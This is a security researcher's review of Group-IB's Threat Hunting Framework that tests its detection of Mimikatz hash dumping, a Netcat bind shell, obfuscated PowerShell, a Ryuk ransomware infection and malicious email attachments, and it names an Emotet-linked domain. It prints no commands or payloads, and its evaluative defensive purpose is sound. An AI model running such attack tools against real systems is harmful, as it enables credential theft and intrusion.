Toni Grzinic, Security Researcher

April 6, 2021

Review: Group-IB Threat Hunting Framework

The IT infrastructure of larger organizations is very heterogeneous. They have endpoints, servers and mobile devices running various operating systems and accessing internal systems. On those systems, there is a great number of disparate tools – from open-source databases and web servers to commercial tools used by the organization’s financial department. Furthermore, these applications can now also be deployed on different clouds to achieve further resilience, adding even more complexity to an already intricate infrastructure.

Managing IT infrastructure poses a hard problem, especially in these pandemic times where the workforce tends to work remotely. Building an additional layer of security over this infrastructure is a complicated undertaking and the success of this project will depend on the availability of security personnel and of security monitoring, detection and response tools that can reduce their burden. Unfortunately, due to the complexity of securing infrastructure and the enormous volume of attack vectors, the maturity of organizations’ security monitoring can fall behind.

One of the solutions to this problem is to use technologies that can provide visibility in the organization’s infrastructure, while simultaneously collecting and detecting anomalous events as well as responding to them.

A few years ago, security expert Anton Chuvakin suggested the concept of EDR (endpoint detection and response) in the form of a lightweight endpoint agent that fills the gap between detection and response capabilities available at that time.

EDR has progressed to the concept of XDR – extended detection and response – which represents a merger of defense and response capabilities between various infrastructure layers (network traffic, email, endpoints, cloud instances, shared storage, etc.).

To be successful, XDR should inspect different layers, record and store events, and – based on its advanced analytics features – correlate events over layers to detect those that should be inspected by higher-tier analysts. The goal is a faster detection and response cycle to reduce the time attackers can lurk in your infrastructure, but also to reduce SOC analysts’ alert fatigue and prevent burnout.

We have tested Group-IB’s Threat Hunting Framework (THF), which tells the full story of an incident and its mastermind and can correlate events and alerts between different infrastructure layers, before escalating incidents that need additional attention from analysts. Its purpose is to do passive security monitoring, but also to uncover attacks and reduce the time attackers spend on your systems. It relies on global threat intelligence capabilities by Group-IB that can give analysts additional context regarding security alerts and incidents.

Methodology

For this review, we used a cloud sensor and a Huntbox (management system) instance. We installed Huntpoint, a separate lightweight endpoint agent, on virtualized (KVM) endpoints. The endpoints’ operating system was Windows 10 with the latest patches, on which we manually installed Huntpoint. For some use cases we disabled Windows Defender (Microsoft’s antivirus solution) so that we can test Huntpoint detection and blocking capabilities in the wild.

On the endpoints, we performed simple test actions to see if these events are later available in THF. We:

Accessed and downloaded malicious files
Used Windows Script Host with a VBS script
Used PowerShell to obfuscate command execution
Made Wmic process calls
Dumped NTLM hashes with Mimikatz
Opened a bind shell with Netcat

We also performed a full infection with the Ryuk ransomware and tried to isolate the host.

To test email detection capabilities, we used various malicious documents (MS Word files, PDFs) and archives that were additionally nested or were password protected. We sent these malicious documents as email attachments from a ProtonMail account, to avoid emails getting blocked from being delivered to the monitored mailbox.

We tested THF Polygon, the malware detonation platform, with the same set of files. We manually tested Ryuk and Sigma ransomware by uploading them to Polygon. Other malicious files from the test dataset were sent automatically from Huntpoint. The collected indicators were used for testing Group-IB Threat Intelligence & Attribution system.

During the test we kept an eye on these success factors that helped us form a final opinion of the product:

Detection capabilities (endpoint events, files and email)
Ease of use and integration capabilities
Threat Intelligence data quality while providing context for existing events
Resource consumption (CPU/RAM for EDR, etc.)

Threat Hunting Framework

Group-IB’s Threat Hunting Framework (THF) is a solution that helps organizations identify their security blind spots and gives a holistic layer of protection to their most critical services both in IT and OT environments.

The framework’s objective is to uncover unknown threats and adversaries by detecting anomalous activities and events and correlating them with Group-IB’s Threat Intelligence & Attribution system, which is capable of attributing cybersecurity incidents to specific adversaries. In other words, when you spot a suspicious domain/IP form in your network traffic, with a few clicks you can pivot and uncover what is behind this infrastructure, view historical evidence of previous malicious activities and available attribution information to help you broaden or quickly close your investigation. THF closely follows the incident response process by having a dedicated component for every step.

There are two flavors of THF: the enterprise version, which is tailored for most business organizations that use a standard technology stack (email server, Windows domain, Windows/macOS endpoints, proxy server, etc.), and the industrial version, which is able to analyze industrial-grade protocols and protect industrial control system (ICS) devices and supervisory control and data acquisition (SCADA) systems.

Threat Hunting Framework is able to:

Analyze network traffic and detect suspicious activities (covert channels, tunnels, remote control, C&C beaconing) by using the Sensor module
Terminate encrypted connections at Layer 2 and Layer 3
Integrate with on-premises and cloud email systems
Provide visibility into endpoints and manage incidents on them using the EDR component/system called THF Huntpoint. THF Huntpoint can detect popular privilege escalation attacks and lateral movement techniques (pass-the-hash/ticket, Mimikatz, NTLM bruteforce, use of living-of-the-land binaries and similar tools)
Analyze files by using the malware detonation platform THF Polygon
Perform advanced threat hunting using logs from THF Huntpoint, email channel, traffic and behavior markers of each analyzed file from any source
Detect anomalies and unknown threats by correlating all available data between various THF modules
Enriching events with data/information from Group-IB’s Threat Intelligence & Attribution cloud database

All the data is enriched and available from a central dashboard and management system called THF Huntbox. THF Huntbox enables incident management, correlation of events and collaboration between analysts during threat hunting and IR activities. All network traffic anomalies, email alerts, Huntpoint detections, and files detonated within Polygon are available and the user can correlate the event data (IoCs) with the Threat Intelligence & Attribution database by using graph analysis and other techniques.

THF can also be paired with CERT-GIB (Group-IB’s Computer Emergency Response Team) by sending telemetry data or IoCs for further investigation by experts, which can bring a higher level of expertise to complex incidents and increase the maturity level of your SOC.

Figure 1 – Threat Hunting Framework’s architecture with all available components

THF components

THF Sensor and THF Decryptor

THF Sensor is a system used to analyze incoming and outgoing network traffic in real-time, extract files from it, using ML-based intelligence traffic analysis approaches (to detect lateral movement, DGA activity and covert tunnels) and signatures, block suspicious files (with the proxy, ICAP integration). All files that are collected from the network traffic can be sent to THF Polygon, a file detonation system that is used for behavioral analysis.

Sensor comes as a 1U physical appliance or can be deployed as a Virtual Machine depending on your use case and requirements. For analyzing 250Mbps over a SPAN port, you will need at minimum 32Gb RAM and 12 vCPUs. Sensor can analyze mirrored traffic from the SPAN/RSPAN port, TAP devices or traffic from RSPAN sent over GRE tunnels, meaning that, when deployed, it has no effect on the enterprise network throughput. Sensor supports a wide range of bandwidth configurations, the standard versions support 250, 1000 and 5000 Mbps, but Sensor can support high throughput architectures up to 10 Gbps. Client is able to use more than one Sensor and basically cover any bandwidth, even at the ISP level.

During analysis, THF Sensor can detect network anomalies such as covert channels, tunnels, remote control, and various techniques of lateral movement. It can also extract email content from mail traffic and analyze it – this capability is pretty interesting because it allows it to spot passwords for archive files sent in emails (and avoid brute-forcing them).

There is a special THF Sensor version tailored for industrial systems — THF Sensor Industrial — which is able to dissect ICS protocols. Sensor Industrial supports a variety of ICS protocols (Modbus, S7comm, S7comm+, UMAS, OPCUA, OPCDA, IEC104, DNP3, DeltaAV, CIP, MQTT and other), and can detect topology changes and control integrity of software and firmware used on PLCs. It is also possible to set up detection rules based on policies that are available through the configuration options.

THF Sensor can analyze encrypted sessions by using the THF Decryptor component, which detects TLS/SSL-protected sessions, performs a certificate replacement and can route the proxied traffic. THF Decryptor supports all popular TLS versions (1.1 – 1.3) and cipher suites. It can be deployed and works in various modes: transparent (bridge) mode that works on OSI Layer 2 where it is invisible to the user network, or gateway (router) mode, where it acts as a gateway for the user networks.

THF Huntbox

THF Huntbox is a central management dashboard and reporting point of Group-IB Threat Hunting Framework. It is accessible as a web application and contains management capabilities for THF components (THF Sensor, THF Polygon, and THF Huntpoint) and acts as a correlation engine for managing events, alerts and incidents as well as scalable storage for all collected raw logs and other data. Through the THF Huntbox interface, users can see event details, create reports and escalate incidents, as well as produce reports and do threat hunting in the local and global context. THF Huntbox acts as a front-end for THF Polygon’s dynamic analysis reports.

Figure 2 – The THF Huntbox welcome screen is a dashboard containing the appliance status, statistics and latest alerts

THF Huntbox has the following sections:

Incidents – Critical tickets that need analysts’ immediate attention and resolution. It is possible to collaborate and comment on the progress with other analysts within your organization. We collaborated with CERT-GIB, their support is a high value service that can augment users’ detection and response ability
Alerts – Potentially malicious events escalated by various THF components (e.g., THF Polygon, THF Huntpoint), containing correlated events and detection information
Graph – Group-IB’s tool for network analysis running on Group-IB Threat Intelligence & Attribution database that contains threat data and historical information of all network nodes (including Whois history, SSLs, DNS records, etc.) intelligence, but also unstructured data collected from various underground communication channels, forums and social networks
Investigation – All available events are located here. This section is divided into:

Emails – Containing all analyzed emails and detections of potentially harmful content
Files – Containing all the files extracted from network traffic, proxy-server, endpoints, emails, file shares. Files could also be uploaded for dynamic analysis manually or automatically with API. For every file there is an available Polygon report that provides a verdict on whether the file is malicious or benign
Computers – Containing details on and available actions (e.g., isolation from network) for all endpoints registered to the THF instance
Huntpoint events – Containing all events collected from Huntpoint clients
Network connections – Containing extracted network connections from the sensors
Reports – Containing summary reports of all activity in a given date range and reports related to specific incidents, alerts or events

Figure 3 – Correlation in action: Multiple malicious emails sent from the same address resulted in an escalation of an incident

We spent most of the time in the Investigation section, searching for raw events and combing the files and emails reports. Events and their metadata can be integrated with SIEMs with syslog and with other monitoring systems. THF correlates and aggregates events across all of its modules (e.g., email from THF Sensor and a THF Polygon analysis of malicious attachment) and can block them automatically or manually, based on your configuration, rules and policies (see Figure 3 for email). THF Huntbox workflows are easy to get used to, help reduce analysts’ cognitive load and allow them to focus on actionable alerts. All triaging features are present in a central place and searching for additional context is available under the Graph view.

THF Huntbox can also replace a classic ticketing system for tracking incidents and alerts. The Alerts and Incident sections are helpful for incident response workflows, lots of events can be automatically correlated and analysts can link alerts to incidents, manually correlate events and comment on the timeline.

Alerts are usually triggered by specific indicators of compromise (domains, IPs, files, emails, Huntpoint events) found during threat hunting activities. Incidents contain one or multiple alerts and other relevant events that give more context.

The collaboration option removes the need for having another system for this specific purpose. Analysts can comment and attach files (although a wider view would be helpful for lengthy comments).

Figure 4 – Alert contains a timeline where it is possible to collaborate and comment on new findings

THF Huntpoint

THF Huntpoint is a lightweight agent installed on endpoints that collects and analyzes all system changes and user’s behaviour (80+ events types, including created processes, inter-process communications, registry changes, file system changes, network connections, etc.), and extracts files from the endpoints and forwards them to THF Polygon for additional analysis. It is used to achieve full visibility of an organization’s endpoints and provides a complete timeline of events that happened on it.

THF Huntpoint detects anomalies and blocks malicious files and can be used to remotely collect forensic data needed for triage or to isolate the infected machine during incident response. The events can be searched with a query language that is similar to other SIEM query languages, like Splunk and Elasticsearch. An example of event details can be seen in Figure 5.

Figure 5 – Huntpoint Event details

Installing THF Huntpoint is a simple process. We installed it manually, but it can be installed with Group Policy or via a specialized THF Huntpoint Installer that is integrated with Active Directory.

We tested our endpoints with malicious files in various formats (documents, executables, archives like ZIP, RAR, ISO). Our tests were performed with Windows Defender turned off to not interfere with THF Huntpoint’s detection capabilities. Huntpoint detected all malicious files on the first try, files were quarantined and triggered alerts visible in THF Huntbox, as shown in Figure 6.

Figure 6 – Malicious files detected with Huntpoint

THF Huntpoint gives a lot of insight into what is happening on the endpoint. All user activity – creating or opening of files/processes/threads/registry keys, network traffic and more – is visible under the Huntpoint Events section in Huntbox.

Figure 7 and 8 – Huntpoint Events search by domain name and IP address

To perform a simple test, we created a text file (action visible in THF Huntbox in Figure 5) and we visited helpnetsecurity.com (action visible in THF Huntbox in Figure 7). Without digging deeply in the documentation, we successfully found the needed fields for querying events. Although, time and patience are needed to get used to field names and become nimble with Huntpoint events querying for more complex queries.

In THF Huntbox, you can save searches for future investigations and even share these searches with your colleagues. This comes in handy when you want to have a “cookbook” of basic queries to detect some popular misuse cases (e.g., suspicious PowerShell downloads).

The other THF Huntpoint tests that we performed were related to malware infections. We infected our endpoint with ransomware, and the executable files have been sent to THF Polygon for detonation and a final verdict. The infections were successfully detected (Figure 9) and were visible in THF Huntbox under Alerts.

Figure 9 – Detection of ransomware that has been sent to Polygon

During this last test, the THF Huntpoint client on the endpoint consumed only 20-40 Mb of RAM, with an unnoticeable pressure on CPU usage. From a performance standpoint, you get full visibility with minimum impact on resources. Due to a big number of events during the ransomware infection, we noticed that there was a short delay before some events became available in Huntbox, but after some time, all events were available for querying.

We performed simple tests to see if all scenarios that can be performed by an attacker are recorded in THF Huntpoint and available in THF Huntbox. E.g., in Figures 10 and 11 you can see the detection of Netcat use and of a simple encoded PowerShell execution of a command.

Figure 10 and 11 – Events containing Netcat and PowerShell misuse

We also tried using Mimikatz to dump NTLM hashes present on endpoints, and this event was also successfully detected and escalated to an incident (Figure 12).

Figure 12 – Use of Mimikatz detected on Huntpoint endpoint, visible as an alert

THF Huntpoint is available only for Microsoft Windows for now, but in the near future should also be available for other platforms like macOS and Linux.

THF Polygon

THF Polygon is a file detonation platform. It is integrated in THF with the purpose to analyze unknown files and emails in an isolated environment. The source of files can be network traffic from THF Sensor, ICAP integration for web-traffic analysis, local/public file storage,the THF Huntpoint client or API integrations.

Group-IB has developed and maintains an open source library to simplify integration with THF Polygon API so it could be employed in any existing application or a workflow that deals with untrusted sources of URLs of files (ticket systems, support chats, etc). The library is available on GitHub and it’s really easy to start using it.

Another integration capability we liked is the existing integration with the Palo Alto XSOAR solution: this allows to embed THF Polygon into existing security workflows that run on XSOAR platform.

review Threat Hunting Framework

Figure 13 – Malicious behavior markers of the analyzed file

The analyzed file is executed in an isolated environment, and after a few (2-5) minutes you get the full behavior analysis report regarding the file, network, registry, process events that were recorded (Figure 13). You can preview the execution changes through a video that shows how the analyzed artifact behaves.

Behavior markers are available as a list or as a populated MITRE ATT&CK matrix (Figure 14). You can also view the file composition and the process tree (Figure 15), which can be useful in detecting techniques that involve process changes (e.g., process injection or process hollowing).

Figure 14 – Malicious markers in a MITRE ATT&CK matrix

All IoCs that are collected with THF Polygon can be enriched using Graph Network Analysis to get a global context. THF Polygon can also be used via an API that can trigger analysis and fetch results when it’s finished.

Figure 15 – Process tree in the THF Polygon report

As we described in the Methodology section of this review, we tried sending malicious attachments to the monitored mailbox. In Figures 16-18, you can see that the files that contained a malicious document and the same archived document were successfully detected after scanning the files with THF Polygon. The mail integration is available for internal mail servers but there is also a new component (Atmosphere) that can scan and detect attacks for mailboxes that are cloud-based (e.g., Office 365 or Google for Business). The mail integration performs attachment and link analysis, but can also detect BEC and spear phishing (i.e., emails that often don’t contain attachments or links).

Figure 16, 17, 18 – Email processing and detection in action

Graph view (Group-IB Threat Intelligence & Attribution)

Global Threat Intelligence & Attribution is a threat intelligence database and analytical tool that is the result of Group-IB’s efforts aimed at meticulously collecting and scanning the internet for more than a decade. The database contains:

The whole available IPv4 and IPv6 spaces (scanned daily)
211 million SSH fingerprints
650 million domains with historical data going back for more than 16 years (including DNS registration changes, WHOIS records)
1.6 billion certificates
Hashes of malicious files
Data collected from forums and social networks

The interface is simple and similar to that of another Group-IB product – the Fraud Hunting Platform.

This THF component is invaluable, because sometimes you can spot a weird domain or hash while investigating some events and you need more context around it. You copy the indicator in the Graph view and in seconds you have a whole connected graph that helps you to level up your investigation capabilities.

For example, we used a malicious domain that was part of Emotet campaigns, the result is visible in Figure 19. You can refine your search results by shrinking the timeline under the actual graph. Or you can control the depth of the graph by defining the number of steps that refines the number of indicators you can see from the main one – this is helpful with indicators that have a lot of interconnections.

Figure 19 – Graph showing data about an Emotet-linked domain

THF takes care of private data and it is compliant with various data security and privacy legislation, so it uses masks to hide private information (e.g., telephone numbers available from social networks). Graph is certainly helpful to analysts but also to law enforcement, because it can be used to build a complete image of a malware campaign’s back-end infrastructure. It is not uncommon for organizations like national CERTs, INTERPOL and Europol to collaborate and partner with Group-IB in takedowns of malware infrastructure and operations.

Figure 20 – Files related to a domain

Graph Network Analysis enables the attribution of specific indicators to a specific threat, and also to correlate events that at first look unrelated. In Figure 21 you can see that our domain search resulted in the attribution to the Emotet campaign. Compared to manual analysis, which can be a rabbit hole with single indicators spawning additional ones that also have to be analyzed, graph analysis saves your time when you find a suspicious domain in your logs.

Figure 21 – The domain giatot365.com is attributed to Emotet, and uncovers persons related to it

Conclusion and verdict

Threat Hunting Framework is a rock-solid product rooted in Group-IB’s abundant expertise. It is built around the classic incident handling workflow common in Community Emergency Response Team. It is simple to use and usable to SOC analysts of all levels and CISOs, who can get summary reports and statistics illustrating the secure level of their infrastructure.

After the installation of THF Huntpoint and THF Sensor modules, you get all of the tools for threat hunting in your organization out of the box. In most cases, fast triage can be done without leaving THF Huntbox. Depending on your use case scenario, THF can eliminate the need for a full-fledged SIEM and replace its functionality because it is built around the same ideas.

THF has a very mild learning curve. After you get used to the query language and event fields, you can get creative in your threat hunting endeavors pretty quickly. THF supports battle-tested tools like Yara and Suricata that make it compatible with most threat intelligence sources, and enables you to make custom detection rules. It is carefully designed to reduce the number of alerts and, consequently, analysts’ fatigue. This can sometimes come at the cost of reducing some automatic detections on endpoints related to red teaming techniques.

THF is a valuable tool for analysts and incident responders. It cannot replace human experts, but it will find anomalies and correlate them over various layers so they don’t have to do it manually. The lack of skillful analysts can be mitigated by using the THF in collaboration with CERT-GIB or other manager security services providers that employ THF as a security platform. Group-IB runs an open partnership program for MSSPs around the world to deliver cutting-edge security services throughout the world.

We can recommend Threat Hunting Framework because it delivers on the promise of working on various layers (network, email system, files, endpoints, cloud) and providing actionable analytics from incidents/events.

The incident management capabilities are accessible and will be enough for most organizations. Group-IB Threat Intelligence & Attribution will enhance the threat intelligence and hunting capabilities in every organization, enable fast triage or more in-depth analyses, will save time and reduce the need for the integration of additional feeds.

More about